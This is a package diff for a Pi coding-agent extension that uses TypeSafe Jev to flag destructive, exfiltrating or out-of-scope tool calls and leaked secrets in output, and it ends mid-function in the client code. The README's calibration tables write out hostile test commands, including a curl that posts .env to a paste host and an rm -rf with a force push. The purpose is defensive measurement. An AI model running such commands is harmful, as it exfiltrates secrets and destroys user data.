@pi-in-go/pigpen-jev 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (128) hide show
  1. package/CREDITS.md +22 -0
  2. package/LICENSE +22 -0
  3. package/README.md +237 -0
  4. package/extensions/jev/ask.go +166 -0
  5. package/extensions/jev/ask_test.go +218 -0
  6. package/extensions/jev/backend.go +128 -0
  7. package/extensions/jev/bench_test.go +64 -0
  8. package/extensions/jev/boundaries_test.go +159 -0
  9. package/extensions/jev/command.go +224 -0
  10. package/extensions/jev/commands_test.go +214 -0
  11. package/extensions/jev/config.go +450 -0
  12. package/extensions/jev/errors_test.go +191 -0
  13. package/extensions/jev/extension.go +391 -0
  14. package/extensions/jev/fakehost_test.go +548 -0
  15. package/extensions/jev/gate.go +125 -0
  16. package/extensions/jev/gate_test.go +610 -0
  17. package/extensions/jev/gatekey_test.go +24 -0
  18. package/extensions/jev/go.mod +9 -0
  19. package/extensions/jev/go.sum +2 -0
  20. package/extensions/jev/go.work +10 -0
  21. package/extensions/jev/helpers_test.go +404 -0
  22. package/extensions/jev/memo.go +88 -0
  23. package/extensions/jev/output.go +89 -0
  24. package/extensions/jev/output_test.go +187 -0
  25. package/extensions/jev/ownmodel_test.go +118 -0
  26. package/extensions/jev/render.go +136 -0
  27. package/extensions/jev/review_test.go +310 -0
  28. package/extensions/jev/source_test.go +57 -0
  29. package/extensions/jev/text.go +174 -0
  30. package/extensions/jev/trust_test.go +335 -0
  31. package/extensions/jev/types.go +227 -0
  32. package/libs/typesafe/CONTRACT.md +125 -0
  33. package/libs/typesafe/CREDITS.md +37 -0
  34. package/libs/typesafe/LICENSE +23 -0
  35. package/libs/typesafe/README.md +19 -0
  36. package/libs/typesafe/go.mod +3 -0
  37. package/libs/typesafe/libraries/ownmodel/backend_test.go +496 -0
  38. package/libs/typesafe/libraries/ownmodel/canon.go +190 -0
  39. package/libs/typesafe/libraries/ownmodel/convert.go +199 -0
  40. package/libs/typesafe/libraries/ownmodel/doc.go +15 -0
  41. package/libs/typesafe/libraries/ownmodel/equivalence_test.go +199 -0
  42. package/libs/typesafe/libraries/ownmodel/helpers_test.go +155 -0
  43. package/libs/typesafe/libraries/ownmodel/mutation_test.go +31 -0
  44. package/libs/typesafe/libraries/ownmodel/ownmodel.go +225 -0
  45. package/libs/typesafe/libraries/ownmodel/plan.go +442 -0
  46. package/libs/typesafe/libraries/ownmodel/run.go +288 -0
  47. package/libs/typesafe/libraries/ownmodel/schema_test.go +254 -0
  48. package/libs/typesafe/libraries/ownmodel/twins_test.go +169 -0
  49. package/libs/typesafe/libraries/ownmodel/utils_test.go +125 -0
  50. package/libs/typesafe/libraries/pigmodel/pigmodel.go +264 -0
  51. package/libs/typesafe/libraries/pigmodel/pigmodel_test.go +410 -0
  52. package/libs/typesafe/libraries/typesafe/answers.go +268 -0
  53. package/libs/typesafe/libraries/typesafe/api_response_test.go +113 -0
  54. package/libs/typesafe/libraries/typesafe/batch.go +80 -0
  55. package/libs/typesafe/libraries/typesafe/batch_test.go +133 -0
  56. package/libs/typesafe/libraries/typesafe/bench_test.go +71 -0
  57. package/libs/typesafe/libraries/typesafe/client.go +561 -0
  58. package/libs/typesafe/libraries/typesafe/client_test.go +495 -0
  59. package/libs/typesafe/libraries/typesafe/crosscheck_test.go +464 -0
  60. package/libs/typesafe/libraries/typesafe/crosscheck_workflowevals_test.go +219 -0
  61. package/libs/typesafe/libraries/typesafe/doc.go +27 -0
  62. package/libs/typesafe/libraries/typesafe/entry.go +142 -0
  63. package/libs/typesafe/libraries/typesafe/env.go +11 -0
  64. package/libs/typesafe/libraries/typesafe/errors.go +310 -0
  65. package/libs/typesafe/libraries/typesafe/errors_test.go +175 -0
  66. package/libs/typesafe/libraries/typesafe/helpers_test.go +294 -0
  67. package/libs/typesafe/libraries/typesafe/live_test.go +96 -0
  68. package/libs/typesafe/libraries/typesafe/logging.go +160 -0
  69. package/libs/typesafe/libraries/typesafe/logging_test.go +259 -0
  70. package/libs/typesafe/libraries/typesafe/marshal_test.go +112 -0
  71. package/libs/typesafe/libraries/typesafe/mutation_test.go +39 -0
  72. package/libs/typesafe/libraries/typesafe/questions.go +490 -0
  73. package/libs/typesafe/libraries/typesafe/questions_test.go +166 -0
  74. package/libs/typesafe/libraries/typesafe/regressions_test.go +159 -0
  75. package/libs/typesafe/libraries/typesafe/reliability_test.go +649 -0
  76. package/libs/typesafe/libraries/typesafe/retry.go +350 -0
  77. package/libs/typesafe/libraries/typesafe/retry_test.go +297 -0
  78. package/libs/typesafe/libraries/typesafe/runtime_test.go +26 -0
  79. package/libs/typesafe/libraries/typesafe/transport_test.go +163 -0
  80. package/libs/typesafe/libraries/typesafe/twins_test.go +127 -0
  81. package/libs/typesafe/libraries/typesafe/types_test.go +165 -0
  82. package/libs/typesafe/libraries/typesafe/version.go +10 -0
  83. package/libs/typesafe/package.json +37 -0
  84. package/libs/typesafe/provenance.json +49 -0
  85. package/package.json +42 -0
  86. package/port/PORT.md +107 -0
  87. package/port/e2e/gate-and-output.py +35 -0
  88. package/port/e2e/jev-ask.py +36 -0
  89. package/port/e2e/model-switch.py +44 -0
  90. package/port/e2e/off-by-default.py +34 -0
  91. package/port/gen-scenarios.py +103 -0
  92. package/port/golden/cache-identical-calls.jsonl +30 -0
  93. package/port/golden/clear.jsonl +22 -0
  94. package/port/golden/commands.jsonl +43 -0
  95. package/port/golden/enforce-accept.jsonl +23 -0
  96. package/port/golden/enforce-decline.jsonl +22 -0
  97. package/port/golden/jev-ask.jsonl +20 -0
  98. package/port/golden/output-advice.jsonl +23 -0
  99. package/port/golden/output-leak.jsonl +24 -0
  100. package/port/golden/output-low-confidence.jsonl +22 -0
  101. package/port/golden/shadow-flagged.jsonl +23 -0
  102. package/port/golden/unjudged-tools.jsonl +19 -0
  103. package/port/golden/write-elision.jsonl +21 -0
  104. package/port/mutate-unit.py +63 -0
  105. package/port/mutations.json +578 -0
  106. package/port/oracle/LICENSE +21 -0
  107. package/port/oracle/README.md +181 -0
  108. package/port/oracle/SHA256SUMS +8 -0
  109. package/port/oracle/package.json +43 -0
  110. package/port/oracle/src/client.ts +409 -0
  111. package/port/oracle/src/config.ts +363 -0
  112. package/port/oracle/src/gate.ts +229 -0
  113. package/port/oracle/src/index.ts +649 -0
  114. package/port/oracle/src/output.ts +163 -0
  115. package/port/red-run.log +309 -0
  116. package/port/scenarios/cache-identical-calls.json +71 -0
  117. package/port/scenarios/clear.json +61 -0
  118. package/port/scenarios/commands.json +119 -0
  119. package/port/scenarios/enforce-accept.json +66 -0
  120. package/port/scenarios/enforce-decline.json +57 -0
  121. package/port/scenarios/jev-ask.json +83 -0
  122. package/port/scenarios/output-advice.json +61 -0
  123. package/port/scenarios/output-leak.json +61 -0
  124. package/port/scenarios/output-low-confidence.json +61 -0
  125. package/port/scenarios/shadow-flagged.json +61 -0
  126. package/port/scenarios/unjudged-tools.json +55 -0
  127. package/port/scenarios/write-elision.json +53 -0
  128. package/provenance.json +18 -0
@@ -0,0 +1,181 @@
1
+ # pi-jev
2
+
3
+ TypeSafe [Jev](https://docs.typesafe.ai) as a decision layer for the [Pi coding agent](https://github.com/earendil-works/pi).
4
+
5
+ Jev answers typed questions about a piece of state. Ask whether something is true and you get a probability. Ask it to pick from a list and you get the option plus a distribution over the alternatives. It does not write prose, so nothing here parses sentences. The answers arrive as numbers your code branches on.
6
+
7
+ Three things use it. A gate judges `bash`, `write`, and `edit` calls before they run. An output judge reads what a `bash` call printed. A `jev_ask` tool lets the model ask for the same kind of judgement itself.
8
+
9
+ ## Install
10
+
11
+ ```bash
12
+ pi install npm:@y0usaf/pi-jev
13
+ ```
14
+
15
+ The extension needs an API key. Without one it loads, says so once, and stays out of the way.
16
+
17
+ ## The gate
18
+
19
+ | Question | Type | Reads | Threshold |
20
+ |---|---|---|---|
21
+ | Is this action destructive? | noul | `destructive` | 0.90 |
22
+ | Does this send local data or secrets off-machine? | noul | `exfiltration` | 0.70 |
23
+ | Does this affect anything beyond what the user asked for? | noul | `beyond_scope` | 0.85 |
24
+ | How much damage if the user did not want it? | score (4 levels) | `impact` | 2.50 |
25
+
26
+ All four go in one request, so a judgement costs one round trip of roughly 300 ms instead of four.
27
+
28
+ **Shadow mode is the default.** A flagged call produces a notification and a footer status. In enforce mode a flagged call asks you to confirm before it runs. Headless runs (`-p`, RPC) cannot show a prompt, so enforcement falls back to the same warning unless you set `gate.blockWithoutUI`.
29
+
30
+ **Every error path fails open.** A missing key, a timeout, a 429, or a malformed response produces no verdict and the tool call proceeds. Errors are reported once a minute at most, so a dead endpoint does not fill the transcript.
31
+
32
+ Identical input is judged once per `cacheSeconds` (120 by default). Sibling calls from the same assistant message share one in-flight request rather than each making their own.
33
+
34
+ ## The output judge
35
+
36
+ The gate sees intent. It cannot see what a command printed, so it cannot catch a credential echoed into the transcript, and it cannot tell a network hiccup from a type error. Both are judgements about text that exists only after the call.
37
+
38
+ `tool_result` asks two questions in one request and appends one line to the tool result when either fires:
39
+
40
+ | Question | Type | Reads | Threshold |
41
+ |---|---|---|---|
42
+ | Does this output contain a secret or credential? | noul | `leaks_secret` | 0.90 |
43
+ | What kind of failure is this? | choice (6 options) | `failure_class` | confidence 0.60 |
44
+
45
+ A leak appends `Do not repeat the value in a reply, a file, or a command; refer to it by name instead` and raises a notification. A failure class appends what to do about it: retry a `transient` failure unchanged, fix the environment for `environment`, fix the code for `code_bug`, do not retry `permission`, fix the invocation for `user_error`. `no_failure` says nothing.
46
+
47
+ The advice comes from a table, not a branch. `CLASS_ADVICE` in `src/output.ts` maps each class to one sentence, so adding a class is a row.
48
+
49
+ It never blocks, and it is silent when nothing fires. Judged tools default to `["bash"]`: judging every `read` would cost one request per file opened.
50
+
51
+ ## `jev_ask`
52
+
53
+ For decisions that should come back typed rather than written:
54
+
55
+ ```json
56
+ {
57
+ "state": "the tool output, diff, or message to judge",
58
+ "questions": [
59
+ { "id": "relevant", "type": "noul", "instructions": "Is this relevant to the user's question?" },
60
+ { "id": "label", "type": "choice", "instructions": "Which bucket?",
61
+ "options": [{ "name": "bug", "description": "Defect in existing behaviour" }, { "name": "feature" }] },
62
+ { "id": "quality", "type": "score", "instructions": "How thorough is this?",
63
+ "levels": ["Superficial", "Adequate", "Thorough"] }
64
+ ]
65
+ }
66
+ ```
67
+
68
+ Ask one thing per entry, then combine the answers in your own code. TypeSafe [recommends splitting multi-factor questions](https://docs.typesafe.ai/primitives) because a question weighing several factors at once returns less reliable answers.
69
+
70
+ ## Configure
71
+
72
+ `~/.pi/agent/pi-jev.json`, or project-scoped `.pi/pi-jev.json`. Project values win, and a file only overrides the keys it sets.
73
+
74
+ ```json
75
+ {
76
+ "apiKeyFile": "~/keys/typesafe.txt",
77
+ "model": "jev-latest",
78
+ "maxStateChars": 8000,
79
+ "gate": {
80
+ "enabled": true,
81
+ "mode": "shadow",
82
+ "tools": ["bash", "write", "edit"],
83
+ "argumentChars": 400,
84
+ "cacheSeconds": 120,
85
+ "minConfidence": 0.5,
86
+ "blockWithoutUI": false,
87
+ "blockOn": { "destructive": 0.9, "exfiltration": 0.7, "beyondScope": 0.85, "impact": 2.5 }
88
+ },
89
+ "output": {
90
+ "enabled": true,
91
+ "tools": ["bash"],
92
+ "outputChars": 2000,
93
+ "leakThreshold": 0.9,
94
+ "minConfidence": 0.6
95
+ }
96
+ }
97
+ ```
98
+
99
+ The API key resolves in this order:
100
+
101
+ 1. `TYPESAFE_API_KEY` from the environment
102
+ 2. `apiKey` in the config file
103
+ 3. `apiKeyFile`, a path to read it from, with `~/` expanded
104
+
105
+ `blockOn.impact` is a value on the 0 to 3 damage rubric. `minConfidence` gates that dimension only, because the three noul questions return a probability and no confidence.
106
+
107
+ ## Commands
108
+
109
+ - `/jev` shows mode, model, key source, judged tools, and cache size
110
+ - `/jev on` and `/jev off` toggle both judges for the session
111
+ - `/jev mode shadow|enforce` switches gate modes without a reload
112
+ - `/jev last` prints the last gate verdict with all four answers
113
+ - `/jev output` prints the last judged output: leak probability and failure class
114
+ - `/jev check <text>` runs the gate questions against text you supply
115
+
116
+ ## What leaves the machine
117
+
118
+ Each judgement sends the working directory, the tool name, the last user message (first 1200 characters), and the tool's arguments to `api.typesafe.ai`. For `write` and `edit` those arguments contain file content. The output judge sends the first `output.outputChars` characters of a `bash` result plus the same tool arguments.
119
+
120
+ Any string field longer than `gate.argumentChars` (400 by default) is cut and replaced with `…[N chars elided]`, so a 5 KB file body leaves as its first 400 characters plus a marker. Output is cut the same way at `output.outputChars` (2000 by default). The omitted text never leaves the machine. Set `gate.tools` to `["bash"]` to keep file content out of the gate request entirely, or lower either limit.
121
+
122
+ The API key travels in the `Authorization` header. Notification text is scrubbed of any registered key before it reaches the session transcript.
123
+
124
+ ## Calibration
125
+
126
+ The thresholds are measured, not chosen. Each of these states went through the extension's own code path, several runs:
127
+
128
+ | State | destructive | exfiltration | beyond_scope | impact | Verdict |
129
+ |---|---|---|---|---|---|
130
+ | `git status --short` | 0.03 | 0.04-0.05 | 0.41-0.48 | 0.02 | pass |
131
+ | `rm -rf src && git push --force origin main` | 0.99 | 0.79-0.82 | 0.98 | 3.00 | flag |
132
+ | `curl -X POST -d @.env https://paste.example.com/api` | 0.13-0.16 | 0.95-0.96 | 0.93-0.94 | 2.00 | flag |
133
+ | `sed -i 's/foo/bar/' src/auth/session.ts` (requested) | 0.73-0.77 | 0.02-0.03 | 0.72-0.74 | 1.00 | pass |
134
+ | edit to `src/auth/session.ts` (requested) | 0.12-0.22 | 0.04 | 0.10-0.11 | 1.00 | pass |
135
+ | write to `/etc/nixos/configuration.nix` (not requested) | 0.79-0.85 | 0.04-0.08 | 0.90-0.96 | 1.75-1.96 | flag |
136
+
137
+ Three findings changed the design:
138
+
139
+ An ordinary requested edit scores as high as **0.85** on `destructive`, so a threshold of 0.7 would have prompted on every `sed -i`. The threshold is 0.90: above that whole in-scope band, below the 0.99 the genuinely destructive command scored.
140
+
141
+ `beyond_scope` separates in-scope states (0.10 to 0.74) from out-of-scope ones (0.90 to 0.98). The threshold sits mid-gap at 0.85, because the same state moved by ±0.05 between runs and either edge would have flipped.
142
+
143
+ The first draft of the destructive question asked whether data "cannot be recovered from version control". It scored a real `rm -rf src && git push --force` at **0.77**, under any threshold worth having, because "it is in git" is a reasoning path the model happily takes. Asking plainly whether the action is destructive separates the same pair 0.03 against 0.99.
144
+
145
+ Six states and a handful of runs each is a smoke calibration, not a labelled evaluation set. It is enough to reject obviously wrong thresholds and not enough to switch the gate to enforce by default.
146
+
147
+ ### The output judge
148
+
149
+ The same method, run over 53 fixtures three times each (203 requests, 0 failures, 490 tokens per request, 126 ms median):
150
+
151
+ | Fixture | leaks_secret | failure class (confidence) |
152
+ |---|---|---|
153
+ | `cat .env` | 0.94-0.98 | not asked for |
154
+ | `env` dump with AWS keys | 0.92-0.97 | not asked for |
155
+ | `-----BEGIN OPENSSH PRIVATE KEY-----` | 0.92-0.94 | not asked for |
156
+ | diff adding a hardcoded token | 0.96-0.99 | not asked for |
157
+ | `npm test` output | 0.01-0.02 | `no_failure` |
158
+ | refactor diff | 0.01 | `no_failure` |
159
+ | `ls -la` | 0.01 | `no_failure` |
160
+ | `npm ERR! code ECONNRESET` | 0.01 | `transient` (1.00) |
161
+ | `listen EADDRINUSE :::3000` | 0.01 | `environment` (0.88) |
162
+ | `error TS2322` | 0.01 | `code_bug` (1.00) |
163
+ | `EACCES: permission denied` | 0.02 | `permission` (1.00) |
164
+ | `sh: rg: command not found` | 0.01 | `environment` (1.00) |
165
+ | `fatal: not a git repository` | 0.02 | `environment` (0.42) |
166
+
167
+ The leak question has no overlap at all: 0.92 and above against 0.02 and below, every run. The threshold is 0.90, the top of the empty band between them.
168
+
169
+ The failure class answered at confidence 0.88 to 1.00 when it was right and 0.42 on the one fixture it read differently than the label expected (`fatal: not a git repository` as environment rather than user_error, which is arguable either way). That gap is why `output.minConfidence` is 0.6: a class answer below it appends nothing. Two retry-shaped questions were tried and dropped. Asking "is it safe to run this again unchanged" overlapped across the three phrasings tested (yes 0.73-0.96 against no 0.37-0.66, and 0.68 for `git commit --amend --no-edit`, which is not safe), so advice is derived from the class in code instead of asked.
170
+
171
+ ## Package layout
172
+
173
+ ```
174
+ src/client.ts the Jev HTTP client: request, retries, timeouts, key redaction
175
+ src/config.ts config layering and key resolution
176
+ src/gate.ts the four questions and the verdict rule for pending tool calls
177
+ src/output.ts the two questions and the advice table for finished tool results
178
+ src/index.ts pi wiring: the tool_call and tool_result handlers, jev_ask, /jev
179
+ ```
180
+
181
+ No runtime dependencies. Pi-bundled imports (`@earendil-works/pi-ai`, `@earendil-works/pi-coding-agent`, `typebox`) sit in `peerDependencies` and are not bundled. `src/client.ts` imports nothing from Pi, so it runs standalone under `node --input-type=module`.
@@ -0,0 +1,8 @@
1
+ d771a3c92c3561ccd45eea05bc664cfb82b2933db1112c2f01af0965dd3a9032 src/client.ts
2
+ 9c706fe36f378f23ad68c83a34ecc1c8904d18c1c05bc3be996893ad044a076e src/config.ts
3
+ 3f0be80cf8f65b9e0dcd1f6bcdb38db57f52a87ec89ed57432faabada468e83e src/gate.ts
4
+ 7fecf89390f53ec308d08d182796b1340e4c9553ac5e6cbdc2df19d9ad1b63e0 src/index.ts
5
+ 8fe39b8cf1f0bec9faa9b9ba34a07034fa44cea0baf4113f01e836719419f047 src/output.ts
6
+ 11ef404274ea801e0c84822dbb009a551e01b84cf0ba1e1029b1af3193df0305 LICENSE
7
+ 212bba51320a152ac6087789109ed377517890d5e359b7783eb173aa45141a77 package.json
8
+ c4049ae5637dbe3d658d307954465032b23c350a9847c0b4c12ca951120b9df3 README.md
@@ -0,0 +1,43 @@
1
+ {
2
+ "name": "@y0usaf/pi-jev",
3
+ "version": "0.2.2",
4
+ "description": "TypeSafe Jev as a decision layer for Pi: judges mutating tool calls before they run, reads tool output for secrets and failure class after, and exposes jev_ask for typed calibrated answers instead of prose",
5
+ "homepage": "https://github.com/y0usaf/pi-jev",
6
+ "repository": {
7
+ "type": "git",
8
+ "url": "git+https://github.com/y0usaf/pi-jev.git"
9
+ },
10
+ "keywords": [
11
+ "pi-package",
12
+ "pi-extension",
13
+ "typesafe",
14
+ "jev",
15
+ "guardrails",
16
+ "classification"
17
+ ],
18
+ "license": "MIT",
19
+ "files": [
20
+ "src",
21
+ "README.md"
22
+ ],
23
+ "pi": {
24
+ "extensions": [
25
+ "./src/index.ts"
26
+ ]
27
+ },
28
+ "peerDependencies": {
29
+ "@earendil-works/pi-ai": "*",
30
+ "@earendil-works/pi-coding-agent": "*",
31
+ "typebox": "*"
32
+ },
33
+ "publishConfig": {
34
+ "access": "public"
35
+ },
36
+ "bugs": {
37
+ "url": "https://github.com/y0usaf/pi-jev/issues"
38
+ },
39
+ "author": "y0usaf",
40
+ "scripts": {
41
+ "lint": "biome lint ."
42
+ }
43
+ }
@@ -0,0 +1,409 @@
1
+ /**
2
+ * TypeSafe Jev client - the whole wire protocol.
3
+ *
4
+ * Jev evaluates typed questions against a state and returns typed answers
5
+ * (probabilities, a chosen option, a rubric value). It does not generate text,
6
+ * so nothing here produces prose: callers branch, sort, or route on the
7
+ * numbers. See https://docs.typesafe.ai.
8
+ *
9
+ * This module intentionally imports nothing from Pi. It is fetch + types, so it
10
+ * can be exercised on its own with `node --input-type=module`.
11
+ */
12
+
13
+ export const DEFAULT_ENDPOINT = "https://api.typesafe.ai/v1/systemone";
14
+ export const DEFAULT_MODEL = "jev-latest";
15
+ export const DEFAULT_TIMEOUT_MS = 20_000;
16
+ export const DEFAULT_RETRIES = 2;
17
+
18
+ /** Text, or structured data (chat logs, records, current application state). */
19
+ export type JevState = string | Record<string, unknown> | unknown[];
20
+
21
+ /** Yes/no question. Returns the probability that the answer is yes. */
22
+ export interface NoulQuestion {
23
+ type: "noul";
24
+ instructions: string;
25
+ criteria?: {
26
+ true?: string;
27
+ false?: string;
28
+ };
29
+ }
30
+
31
+ /** Pick one option. Option key -> rubric description; null means no detail. */
32
+ export interface ChoiceQuestion {
33
+ type: "choice";
34
+ instructions: string;
35
+ criteria: Record<string, string | null>;
36
+ }
37
+
38
+ /** Ordered rubric. At least two levels. Returns a probability-weighted value. */
39
+ export interface ScoreQuestion {
40
+ type: "score";
41
+ instructions: string;
42
+ criteria: string[];
43
+ }
44
+
45
+ export type JevQuestion = NoulQuestion | ChoiceQuestion | ScoreQuestion;
46
+
47
+ export interface NoulAnswer {
48
+ type: "noul";
49
+ noul: number;
50
+ }
51
+
52
+ export interface ChoiceAnswer {
53
+ type: "choice";
54
+ choice: string;
55
+ probabilities: Record<string, number>;
56
+ confidence: number;
57
+ }
58
+
59
+ export interface ScoreAnswer {
60
+ type: "score";
61
+ score: number;
62
+ legend: Record<string, string>;
63
+ probabilities: Record<string, number>;
64
+ confidence: number;
65
+ }
66
+
67
+ export type JevAnswer = NoulAnswer | ChoiceAnswer | ScoreAnswer;
68
+
69
+ export interface JevUsage {
70
+ input_tokens?: number;
71
+ output_tokens?: number;
72
+ }
73
+
74
+ export interface JevResponse {
75
+ model: string;
76
+ answers: Record<string, JevAnswer>;
77
+ usage?: JevUsage;
78
+ }
79
+
80
+ export interface JevCall {
81
+ state: JevState;
82
+ questions: Record<string, JevQuestion>;
83
+ apiKey: string;
84
+ model?: string;
85
+ endpoint?: string;
86
+ timeoutMs?: number;
87
+ retries?: number;
88
+ /** Nested work should pass the extension context signal so Esc cancels it. */
89
+ signal?: AbortSignal;
90
+ }
91
+
92
+ export class JevError extends Error {
93
+ readonly status: number | undefined;
94
+ readonly retryable: boolean;
95
+
96
+ constructor(message: string, status?: number, retryable = false) {
97
+ super(message);
98
+ this.name = "JevError";
99
+ this.status = status;
100
+ this.retryable = retryable;
101
+ }
102
+ }
103
+
104
+ const RETRYABLE_STATUS = new Set([429, 529]);
105
+
106
+ /**
107
+ * Evaluate every question against the state in one request. Questions run in
108
+ * parallel and in isolation, so adding questions barely changes latency.
109
+ */
110
+ export async function askJev(call: JevCall): Promise<JevResponse> {
111
+ validateQuestions(call.questions);
112
+ const endpoint = call.endpoint ?? DEFAULT_ENDPOINT;
113
+ const body = JSON.stringify({
114
+ state: call.state,
115
+ model: call.model ?? DEFAULT_MODEL,
116
+ questions: call.questions,
117
+ });
118
+ const retries = call.retries ?? DEFAULT_RETRIES;
119
+ let lastError: JevError | undefined;
120
+
121
+ for (let attempt = 0; attempt <= retries; attempt += 1) {
122
+ if (call.signal?.aborted) break;
123
+ if (attempt > 0) await delay(backoffMs(attempt), call.signal);
124
+ try {
125
+ return await postOnce(endpoint, body, call);
126
+ } catch (error) {
127
+ const failure = asJevError(error);
128
+ lastError = failure;
129
+ if (!failure.retryable) throw failure;
130
+ }
131
+ }
132
+
133
+ throw lastError ?? new JevError("request aborted", undefined, false);
134
+ }
135
+
136
+ async function postOnce(
137
+ endpoint: string,
138
+ body: string,
139
+ call: JevCall,
140
+ ): Promise<JevResponse> {
141
+ const timeoutMs = call.timeoutMs ?? DEFAULT_TIMEOUT_MS;
142
+ const timeout = new AbortController();
143
+ const timer = setTimeout(
144
+ () =>
145
+ timeout.abort(
146
+ new JevError(`request timed out after ${timeoutMs}ms`, undefined, true),
147
+ ),
148
+ timeoutMs,
149
+ );
150
+
151
+ try {
152
+ const response = await fetch(endpoint, {
153
+ method: "POST",
154
+ headers: {
155
+ Authorization: `Bearer ${call.apiKey}`,
156
+ "Content-Type": "application/json",
157
+ },
158
+ body,
159
+ signal: combineSignals([timeout.signal, ...(call.signal ? [call.signal] : [])]),
160
+ });
161
+ const text = await response.text();
162
+
163
+ if (!response.ok) {
164
+ const retryable =
165
+ RETRYABLE_STATUS.has(response.status) || response.status >= 500;
166
+ throw new JevError(
167
+ `HTTP ${response.status}${statusHint(response.status)}: ${truncate(text, 400)}`,
168
+ response.status,
169
+ retryable,
170
+ );
171
+ }
172
+
173
+ let parsed: unknown;
174
+ try {
175
+ parsed = JSON.parse(text);
176
+ } catch {
177
+ throw new JevError(
178
+ `response was not JSON: ${truncate(text, 200)}`,
179
+ response.status,
180
+ false,
181
+ );
182
+ }
183
+ return normalizeResponse(parsed, call.questions);
184
+ } finally {
185
+ clearTimeout(timer);
186
+ }
187
+ }
188
+
189
+ function statusHint(status: number): string {
190
+ switch (status) {
191
+ case 401:
192
+ return " (missing or invalid API key)";
193
+ case 422:
194
+ return " (request body failed validation - check the question shape)";
195
+ case 429:
196
+ return " (rate limited)";
197
+ case 529:
198
+ return " (overloaded)";
199
+ default:
200
+ return "";
201
+ }
202
+ }
203
+
204
+ /** Fail early with a useful message instead of paying for a 422. */
205
+ function validateQuestions(questions: Record<string, JevQuestion>): void {
206
+ const entries = Object.entries(questions);
207
+ if (entries.length === 0) {
208
+ throw new JevError("no questions provided");
209
+ }
210
+ for (const [id, question] of entries) {
211
+ if (typeof question?.instructions !== "string" || !question.instructions.trim()) {
212
+ throw new JevError(`question "${id}": instructions are required`);
213
+ }
214
+ if (question.type === "score" && question.criteria.length < 2) {
215
+ throw new JevError(`question "${id}": score needs at least two levels`);
216
+ }
217
+ if (
218
+ question.type === "choice" &&
219
+ Object.keys(question.criteria ?? {}).length === 0
220
+ ) {
221
+ throw new JevError(`question "${id}": choice needs at least one option`);
222
+ }
223
+ }
224
+ }
225
+
226
+ /**
227
+ * A response must answer every question it was asked, with the asked type.
228
+ * A missing answer is not a zero: callers that default absent probabilities to
229
+ * 0 would read it as "certainly not", so it fails here and reaches the same
230
+ * error path as a timeout or a 5xx.
231
+ */
232
+ function normalizeResponse(
233
+ value: unknown,
234
+ questions: Record<string, JevQuestion>,
235
+ ): JevResponse {
236
+ if (typeof value !== "object" || value === null) {
237
+ throw new JevError("response was not an object");
238
+ }
239
+ const answers = Reflect.get(value, "answers");
240
+ if (typeof answers !== "object" || answers === null) {
241
+ throw new JevError("response is missing the answers map");
242
+ }
243
+ for (const [id, answer] of Object.entries(answers)) {
244
+ if (!isJevAnswer(answer)) {
245
+ throw new JevError(`answer "${id}" has an unknown shape`);
246
+ }
247
+ }
248
+ for (const [id, question] of Object.entries(questions)) {
249
+ const answer: unknown = Reflect.get(answers, id);
250
+ if (answer === undefined) {
251
+ throw new JevError(`response did not answer "${id}"`);
252
+ }
253
+ if (Reflect.get(answer as object, "type") !== question.type) {
254
+ throw new JevError(`answer "${id}" is not a ${question.type}`);
255
+ }
256
+ }
257
+ const model = Reflect.get(value, "model");
258
+ const usage = Reflect.get(value, "usage");
259
+ // Invariant: every entry above passed isJevAnswer, so the map is typed.
260
+ return {
261
+ model: typeof model === "string" ? model : DEFAULT_MODEL,
262
+ answers: answers as Record<string, JevAnswer>,
263
+ usage: isUsage(usage) ? usage : undefined,
264
+ };
265
+ }
266
+
267
+ function isUsage(value: unknown): value is JevUsage {
268
+ if (typeof value !== "object" || value === null) return false;
269
+ const input = Reflect.get(value, "input_tokens");
270
+ const output = Reflect.get(value, "output_tokens");
271
+ return (
272
+ (input === undefined || typeof input === "number") &&
273
+ (output === undefined || typeof output === "number")
274
+ );
275
+ }
276
+
277
+ function isJevAnswer(value: unknown): value is JevAnswer {
278
+ if (typeof value !== "object" || value === null) return false;
279
+ const type: unknown = Reflect.get(value, "type");
280
+ if (type === "noul") return typeof Reflect.get(value, "noul") === "number";
281
+ if (type === "choice") {
282
+ return typeof Reflect.get(value, "choice") === "string" && isDistribution(value);
283
+ }
284
+ if (type === "score") {
285
+ return typeof Reflect.get(value, "score") === "number" && isDistribution(value);
286
+ }
287
+ return false;
288
+ }
289
+
290
+ /** Choice and score answers both carry a confidence and a probability map. */
291
+ function isDistribution(value: object): boolean {
292
+ const probabilities: unknown = Reflect.get(value, "probabilities");
293
+ return (
294
+ typeof Reflect.get(value, "confidence") === "number" &&
295
+ typeof probabilities === "object" &&
296
+ probabilities !== null
297
+ );
298
+ }
299
+
300
+ /** Abort when any source aborts. Local helper: no dependency on AbortSignal.any. */
301
+ function combineSignals(sources: AbortSignal[]): AbortSignal {
302
+ const controller = new AbortController();
303
+ for (const source of sources) {
304
+ if (source.aborted) {
305
+ controller.abort(source.reason);
306
+ break;
307
+ }
308
+ source.addEventListener(
309
+ "abort",
310
+ () => {
311
+ if (!controller.signal.aborted) controller.abort(source.reason);
312
+ },
313
+ { once: true },
314
+ );
315
+ }
316
+ return controller.signal;
317
+ }
318
+
319
+ function asJevError(error: unknown): JevError {
320
+ if (error instanceof JevError) return error;
321
+ /** fetch() surfaces a caller or deadline abort as the abort reason. */
322
+ if (error instanceof Error && (error.name === "AbortError" || error.name === "TimeoutError")) {
323
+ const reason = Reflect.get(error, "cause");
324
+ return reason instanceof JevError
325
+ ? reason
326
+ : new JevError("request aborted", undefined, false);
327
+ }
328
+ return new JevError(
329
+ error instanceof Error ? error.message : String(error),
330
+ undefined,
331
+ true,
332
+ );
333
+ }
334
+
335
+ function backoffMs(attempt: number): number {
336
+ const base = Math.min(1000 * 2 ** (attempt - 1), 8000);
337
+ return base + Math.floor(Math.random() * 250);
338
+ }
339
+
340
+ function delay(ms: number, signal?: AbortSignal): Promise<void> {
341
+ return new Promise((resolve) => {
342
+ const timer = setTimeout(() => {
343
+ signal?.removeEventListener("abort", onAbort);
344
+ resolve();
345
+ }, ms);
346
+ function onAbort() {
347
+ clearTimeout(timer);
348
+ resolve();
349
+ }
350
+ signal?.addEventListener("abort", onAbort, { once: true });
351
+ });
352
+ }
353
+
354
+ function truncate(text: string, max: number): string {
355
+ const collapsed = text.replace(/\s+/g, " ").trim();
356
+ return collapsed.length > max ? `${collapsed.slice(0, max)}\u2026` : collapsed;
357
+ }
358
+
359
+ export function answerFor(
360
+ response: JevResponse,
361
